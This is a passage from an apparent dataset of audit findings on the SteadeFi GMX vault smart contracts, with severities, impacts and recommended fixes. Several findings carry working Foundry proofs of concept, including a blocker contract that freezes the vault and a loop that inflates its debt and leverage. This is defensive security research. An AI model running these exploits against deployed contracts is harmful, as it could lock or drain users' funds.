""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n 
mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. 
(Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log(""DebtAmtBefore: %s"", debtAmtTokenBBefore);\\n console.log(""DebtAmtAfter: %s"", debtAmtTokenBAfter);\\n console.log(""leverageBefore: %s"", leverageBefore);\\n console.log(""leverageAfter: %s"", leverageAfter);\\n }\\n}\\n```\\n" +Setter functions for core GMX contracts,medium,"GMX docs state that their `ExchangeRouter` and `GMXOracle` contracts `will` change as new logic is added. Therefore setter functions should be added to `GMXVault.sol` to be able to update the state variables storing those addressed when the need arises.\\nFrom the GMX docs:\\n```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n",Create setter functions in `GMXVault.sol` as below:\\n```\\n function updateExchangeRouter(address exchangeRouter) external onlyOwner {\\n _store.exchangeRouter = exchangeRouter;\\n emit ExchangeRouterUpdated(exchangeRouter);\\n }\\n\\n function updateGMXOracle(address gmxOracle) external onlyOwner {\\n _store.gmxOracle = gmxOracle;\\n emit GMXOracleUpdated(gmxOracle);\\n }\\n```\\n,Not being able to use the `ExchangeRouter` and `GMXOracle` contracts the protocol would effectively be unusable given their importance.,"```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n" +`GMXVault` can be blocked by a malicious actor,high,"`GMXVault` can be blocked by malicious actor if he made a `depositNative` call with unpayable contract and the deposit then cancelled by the GMX exchange router (3rd party).\\nUsers can deposit native tokens in vaults that either of its token pair is a WNT (wrapped native token) by calling `GMXVault.depositNative` payable function with the required deposit parameters (such as token, amount, minimum share amount, 
slippage & execution fees), then this function will invoke `GMXDeposit.deposit` with a `msg.value` equals the amount that the user wants to deposit + execution fees.\\nIn GMXDeposit.deposit: various checks are made to ensure the sanity of the deposit parameters and the elligibility of the user to deposit, and to calculate the required `tokenA` & `tokenB` needed to deposit in the `GMX` protocol, then the sent native tokens are deposited in the WNT contract and an equivalent amount of WNT is transferred to the vault.\\nAnd before the call is made to the `GMXManager.addLiquidity` (where a call is going to be made to the `GMX.exchangeRouter` contract) to add liquidity; the status of the vault is checked if it's `Open`, if yes; then the status of the vault is set to `Deposit` so that no more deposits or withdrawls can be made (the vault will be blocked until the operation succeeds).\\nSo if the operation succeeds in the `GMX` exchange router; the vault callback will invoke `preocessDeposit` function to finish the process and update the vault status to `Open`.\\nAnd if the operation of adding liquidity is cancelled by the `GMX` exchange router (3rd party); the vault callback will invoke `processDepositCancellation` function to rollback the process by repaying the lendingVaults debts and paying back the native tokens sent by the user, then update the vault status to Openso that the vault is open again for deposits and withdrawals.\\nUsually the deposit (liquidity addition to `GMX` protocol) fails if the user sets a very high slippage parameter when making a deposit (dp.slippage).\\nHow can this be exploited to block the vault? 
Imagine the following scenario:\\nIf a malicious user deploys an unpayable contract (doesn't receive native tokens) and makes a call to the `GMXVault.depositNative` function with a very high slippage to ensure that the deposit will be cancelled by the GMX exchange router.\\nSo when the deposit is cancelled and the vault callback `processDepositCancellation` function is invoked by the router; it will revert as it will try to send back the native tokens to the user who tried to make the deposit (which is the unpayable contract in our case).\\nAnd the status of the vault will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made and the vault will be disabled.\\nThe same scenario will happen if the user got blocklisted later by the deposited token contract (tokenA or tokenB), but the propability of this happening is very low as the GMX exchange router will add liquidity in two transactions with a small time separation between them!\\nCode Instances:\\nGMXVault.depositNative\\n```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n\\nGMXDeposit.deposit /L88\\n```\\n_dc.user = payable(msg.sender);\\n```\\n\\nGMXDeposit.processDepositCancellation /L209-210\\n```\\n(bool success, ) = self.depositCache.user.call{value: address(this).balance}("""");\\n require(success, ""Transfer failed."");\\n```\\n\\nFoundry PoC:\\nA `BlockerContract.sol` is added to mimick the behaviour of an unpayable contract. 
add the following contract to the `2023-10-SteadeFi/test/gmx/local/BlockerContract.sol` directory:\\n`// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\n\\nimport {GMXTypes} from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport {GMXVault} from ""../../../contracts/strategy/gmx/GMXVault.sol"";\\n\\ncontract BlockerContract {\\n constructor() payable {}\\n\\n function callVault(\\n address payable _vaultAddress,\\n GMXTypes.DepositParams memory dp\\n ) external {\\n GMXVault targetVault = GMXVault(_vaultAddress);\\n targetVault.depositNative{value: address(this).balance}(dp);\\n }\\n}`\\n`test_processDepositCancelWillBlockVault` test is added to to the `2023-10-SteadeFi/test/gmx/local/GMXDepositTest.sol` directory; where the blockerContract is deployed with some native tokens to cover deposit amount + execution fees, then this contract calls the `depositNative` via `BlockerContract.callVault`, where the exchange router tries to cancel the deposit but it will not be able as the BlockerContract can't receive back deposited native tokens, and the vault will be blocked.\\nadd this import statement and test to the `GMXDepositTest.sol` file :\\n`import {BlockerContract} from ""./BlockerContract.sol"";`\\n` function test_processDepositCancelWillBlockVault() external {\\n //1. deploy the blockerContract contract with a msg.value=deposit amount + execution fees:\\n uint256 depositAmount = 1 ether;\\n\\n BlockerContract blockerContract = new BlockerContract{\\n value: depositAmount + EXECUTION_FEE\\n }();\\n\\n //check balance before deposit:\\n uint256 blockerContractEthBalance = address(blockerContract).balance;\\n assertEq(depositAmount + EXECUTION_FEE, blockerContractEthBalance);\\n\\n //2. 
preparing deposit params to call ""depositNative"" via the blockerContract:\\n depositParams.token = address(WETH);\\n depositParams.amt = depositAmount;\\n depositParams.minSharesAmt = 0;\\n depositParams.slippage = SLIPPAGE;\\n depositParams.executionFee = EXECUTION_FEE;\\n\\n blockerContract.callVault(payable(address(vault)), depositParams);\\n\\n // vault status is ""Deposit"":\\n assertEq(uint256(vault.store().status), 1);\\n\\n //3. the blockerContract tries to cancel the deposit, but it will not be able to do beacuse it's unpayable contract:\\n vm.expectRevert();\\n mockExchangeRouter.cancelDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n\\n // vault status will be stuck at ""Deposit"":\\n assertEq(uint256(vault.store().status), 1);\\n\\n // check balance after cancelling the deposit, where it will be less than the original as no refund has been paid (the blockerContract is unpayable):\\n assertLt(address(blockerContract).balance, blockerContractEthBalance);\\n }`\\nTest result:\\n`$ forge test --mt `test_processDepositCancelWillBlockVault`\\nRunning 1 test for test/gmx/local/GMXDepositTest.sol:GMXDepositTest\\n[PASS] test_processDepositCancelWillBlockVault() (gas: 1419036)\\nTest result: ok. 
1 passed; 0 failed; 0 skipped; finished in 24.62ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)`",Add a mechanism to enable the user from redeeming his cancelled deposits (pulling) instead of sending it back to him (pushing).,The vault will be blocked as it will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made.,"```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n" +Emergency Closed Vault Can Be Paused Then Resume,medium,"The `emergencyClose` function is intended to be a final measure to repay all debts and shut down the vault permanently, as indicated by the function's documentation. This action should be irreversible to ensure the finality and security of the vault's emergency closure process.\\n```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n\\nHowever, a pathway exists to effectively reopen a vault after it has been closed using `emergencyClose` by invoking the `emergencyPause` and `emergencyResume` functions. 
These functions alter the vault's status, allowing for the resumption of operations which contradicts the intended irreversible nature of an emergency close.\\n```\\nFile: GMXEmergency.sol\\n function emergencyPause(\\n GMXTypes.Store storage self\\n ) external {\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n\\n emit EmergencyPause();\\n }\\n```\\n\\n```\\nFile: GMXEmergency.sol\\n function emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nAdd this to GMXEmergencyTest.t.sol and test with forge test --mt test_close_then_pause -vv:\\n```\\n function test_close_then_pause() external {\\n // Pause the vault\\n vault.emergencyPause();\\n console2.log(""vault status"", uint256(vault.store().status));\\n\\n // Close the vault\\n vault.emergencyClose(deadline);\\n console2.log(""vault status"", uint256(vault.store().status));\\n\\n // Pause the vault again\\n vault.emergencyPause();\\n console2.log(""vault status"", uint256(vault.store().status));\\n assertEq(uint256(vault.store().status), 10, ""vault status not set to paused"");\\n\\n // Resume the vault\\n vault.emergencyResume();\\n console2.log(""vault status"", uint256(vault.store().status));\\n }\\n```\\n",Implement a permanent state or flag within the vault's storage to irrevocably mark the vault as 
closed after `emergencyClose` is called. This flag should prevent any further state-altering operations.\\nModify the `emergencyPause` and `emergencyResume` functions to check for this permanent closure flag and revert if the vault has been emergency closed.,"The impact of this finding is significant, as it undermines the trust model of the emergency close process. Users and stakeholders expect that once a vault is closed in an emergency, it will remain closed as a protective measure. The ability to resume operations after an emergency closure could expose the vault to additional risks and potentially be exploited by malicious actors, especially if the original closure was due to a security threat.","```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n" +The transfer of ERC-20 tokens with blacklist functionality in process functions can lead to stuck vaults,medium,"Inside a few process functions are ERC-20 tokens transfered which could potentially have a blacklist functionality. This can lead to a DoS of the strategy vault. If for example, a blacklisted user withdraws funds.\\nSome ERC-20 tokens like for example USDC (which is used by the system) have the functionality to blacklist specific addresses, so that they are no longer able to transfer and receive tokens. Sending funds to these addresses will lead to a revert. A few of the process functions inside the deposit and withdraw contracts transfer ERC-20 tokens to addresses which could potentially be blacklisted. 
The system is not in an Open state when a keeper bot interacts with such a process function, and if the call to such a function reverts, the status can not be updated back to Open. Therefore, it will remain in the given status and a DoS for all users occurs. The only possibility that DoS stops would be when the user is no longer blacklisted, which can potentially last forever.\\nThe attack flow (could be accidental) would for example look like this:\\nUSDC Blacklisted user calls withdraw with the wish to withdraw USDC\\nwithdraw function passes and status is updated to GMXTypes.Status.Withdraw\\nKeeper calls the processWithdraw function\\nTransferring USDC tokens to blacklisted user reverts\\nTherefore vault is stuck inside GMXTypes.Status.Withdraw status and all users experience a DoS\\nHere are the code snippets of these dangerous transfers inside process functions:\\n```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n\\n```\\nfunction processDepositFailureLiquidityWithdrawal(\\n GMXTypes.Store storage self\\n) public {\\n GMXChecks.beforeProcessAfterDepositFailureLiquidityWithdrawal(self);\\n // rest of code\\n // Refund user the rest of the remaining withdrawn LP assets\\n // Will be in tokenA/tokenB only; so if user deposited LP tokens\\n // they will still be refunded in tokenA/tokenB\\n self.tokenA.safeTransfer(self.depositCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.depositCache.user, self.tokenB.balanceOf(address(this)));\\n // rest of code\\n self.status = 
GMXTypes.Status.Open;\\n}\\n```\\n\\n```\\nfunction processWithdraw(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessWithdrawChecks(self);\\n\\n try GMXProcessWithdraw.processWithdraw(self) {\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n // rest of code\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n \\n // rest of code\\n\\n self.status = GMXTypes.Status.Open;\\n }\\n // rest of code\\n}\\n```\\n","Instead of transferring the ERC-20 tokens directly to a user in the process functions, use a two-step process instead. For example, create another contract whose only purpose is to hold assets and store the information about which address is allowed to withdraw how many of the specified tokens. In the process functions, send the funds to this new contract along with this information instead. So if a user has been blacklisted, the DoS only exists for that specific user and for the rest of the users the system continues to function normally.","DoS of the entire strategy vault, as the status can no longer be updated to Open until the user is no longer blacklisted. 
This can potentially take forever and forces the owners to take emergency action.","```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n" +Rebalance may occur due to wrong requirements check,low,"Before a rebalance can occur, checks are implemented to ensure that `delta` and `debtRatio` remain within their specified limits. However, it's important to note that the check in `GMXChecks::beforeRebalanceChecks` ignores the scenario where these values are equal to any of their limits.\\nIn the current implementation of the `GMXRebalance::rebalanceAdd` function, it first calculates the current values of `debtRatio` and `delta` before making any changes. Subsequently, the `beforeRebalanceChecks` function, checks if these values meet the requirements for a rebalance to occur. 
These requirements now dictate that both `debtRatio` and `delta` must be either ≥ to the `UpperLimit`, or ≤ to the `LowerLimit` for a rebalance to take place.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n\\nSuppose a rebalance is successful. In the `afterRebalanceChecks` section, the code verifies whether both `delta` and `debtRatio` are greater than the `UpperLimit` or less than the `LowerLimit`. This confirmation implies that these limits are indeed inclusive, meaning that the correct interpretation of these limits should be that `LowerLimit` ≤ actualValue ≤ `UpperLimit`. On the other hand, this also indicates that for a rebalancing to occur, the values of `deltaBefore` and `debtRatioBefore` need to be outside their limits, i.e., `delta` should be greater than `Upper` or less than `Lower`. 
However, in the current implementation, if these values are equal to the limit, a rebalance may still occur, which violates the consistency of the `afterRebalanceChecks` function, thus indicating that these limits are inclusive. Consequently, a value equal to the limit needs to be treated as valid and not be able to trigger a rebalance.\\n```\\nfunction afterRebalanceChecks(\\n GMXTypes.Store storage self\\n) external view {\\n // Guards: check that delta is within limits for Neutral strategy\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n int256 _delta = GMXReader.delta(self);\\n\\n if (\\n _delta > self.deltaUpperLimit ||\\n _delta < self.deltaLowerLimit\\n ) revert Errors.InvalidDelta();\\n }\\n\\n // Guards: check that debt is within limits for Long/Neutral strategy\\n uint256 _debtRatio = GMXReader.debtRatio(self);\\n\\n if (\\n _debtRatio > self.debtRatioUpperLimit ||\\n _debtRatio < self.debtRatioLowerLimit\\n ) revert Errors.InvalidDebtRatio();\\n}\\n```\\n\\nImagine the case when `delta` or `debtRatio` is equal to any of its limits; a rebalance will occur. However, on the other hand, these values are valid because they are inclusively within the limits.","Rebalance may occur due to wrong requirements check\\nConsider a strict check to determine if `delta` or `debtRatio` is strictly within its limits, including scenarios where they are equal to any of its limits. 
In such cases, the code should ensure that a rebalance does not occur when these values are precisely at the limit.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n ) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore <= self.deltaUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore >= self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore <= self.debtRatioUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore >= self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n }\\n```\\n","In such a scenario, the system might incorrectly trigger a rebalance of the vault, even when `delta` or `debtRatio` is precisely within the established limits, thus potentially causing unintended rebalancing 
actions.","```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n" +Wrong errors are used for reverts,low,There are checks that revert with wrong errors\\nReverts:\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L68-L69\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L74-L75\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L351-L352\\n```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be 
Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n,Wrong errors are used for reverts\\nConsider using `Errors.EmptyDepositAmount` for the provided cases.,This can lead to user confusion as they won't receive the accurate revert reason.,```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n +Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk,low,"Users who accumulate more than 2^96 UNI tokens may lose their tokens because transfers above that will always revert.\\nThe UNI token contract imposes a transfer limit, restricting the maximum amount of tokens that can be transferred in a single transaction to 2^96 UNI tokens. Any transfer exceeding this threshold will trigger a transaction revert. 
The contract relies on the `balanceOf` function to verify the sender's token balance before proceeding with a transfer.\\n```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n\\nsuch a transfer will always revert for balances above 2^96 UNI tokens\\nhttps://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfers",Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk\\nContracts should always check the amount of UNI being transferred before processing the transaction.,Users who accumulate more than 2^96 UNI tokens may lose their tokens due to a DOS revert when attempting to withdraw their token balance.,"```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n" +`emergencyClose()` may fail to repay any debt,medium,"the `emergencyClose()` function may become ineffective, preventing the contract from repaying any outstanding debt, leading to potential financial losses.\\nWhen the contract is paused, all the liquidity from GMX is withdrawn (in term of `tokenA` and tokenB).\\nThe `emergencyClose()` function is called after the contract is paused due some reasons, possibly when the strategy incurs bad debts or when the contract gets hacked, High volatility, and so on...\\nThis function is responsible for repaying all the amounts of `tokenA` and `tokenB` borrowed from the `lendingVault` contract. It then sets the contract's status to `closed`. After that, users who hold `svToken` shares can withdraw the remaining assets from the contract.\\nThe issue with this function lies in its assumptions, which are not accurate. 
It assumes that the withdrawn amounts from GMX are always sufficient to cover the whole debt.\\n```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n\\nPlease note that `_rp.repayTokenAAmt` and `_rp.repayTokenBAmt` represent the entire debt, and these values remain the same even if a swap is needed.\\nThe function checks if a swap is needed to cover its debt, and here's how it determines whether a swap is required:\\n```\\n function calcSwapForRepay(GMXTypes.Store storage self, GMXTypes.RepayParams memory rp)\\n external\\n view\\n returns (bool, address, address, uint256)\\n {\\n address _tokenFrom;\\n address _tokenTo;\\n uint256 _tokenToAmt;\\n if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n _tokenToAmt = rp.repayTokenAAmt - self.tokenA.balanceOf(address(this));\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else if (rp.repayTokenBAmt > 
self.tokenB.balanceOf(address(this))) {\\n // If more tokenB is needed for repayment\\n _tokenToAmt = rp.repayTokenBAmt - self.tokenB.balanceOf(address(this));\\n _tokenFrom = address(self.tokenA);\\n _tokenTo = address(self.tokenB);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else {\\n // If there is enough to repay both tokens\\n return (false, address(0), address(0), 0);\\n }\\n }\\n```\\n\\nIn plain English, this function in this case assumes: if the contract's balance of one of the tokens (e.g., tokenA) is insufficient to cover `tokenA` debt, it means that the contract balance of the other token (tokenB) should be greater than the debt of `tokenB`, and the value of the remaining balance of `tokenB` after paying off the `tokenB` debt should be equal or greater than the required value to cover the debt of `tokenA`\\nThe two main issues with this assumption are:\\nIf the contract balance of `tokenFrom` is not enough to be swapped for `_tokenToAmt` of `tokenTo`, the swap will revert, causing the function to revert each time it is called when the balance of `tokenFrom` is insufficient.(in most cases in delta long strategy since it's only borrow one token), This is highly likely since emergency closures occur when something detrimental has happened, (such as bad debts).\\nThe second issue arises when the balance of tokenFrom(EX: tokenA) becomes less than `_rp.repayTokenAAmt` after a swap. In this case, the `repay` call will revert when the `lendingVault` contract attempts to `transferFrom` the strategy contract for an amount greater than its balance. 
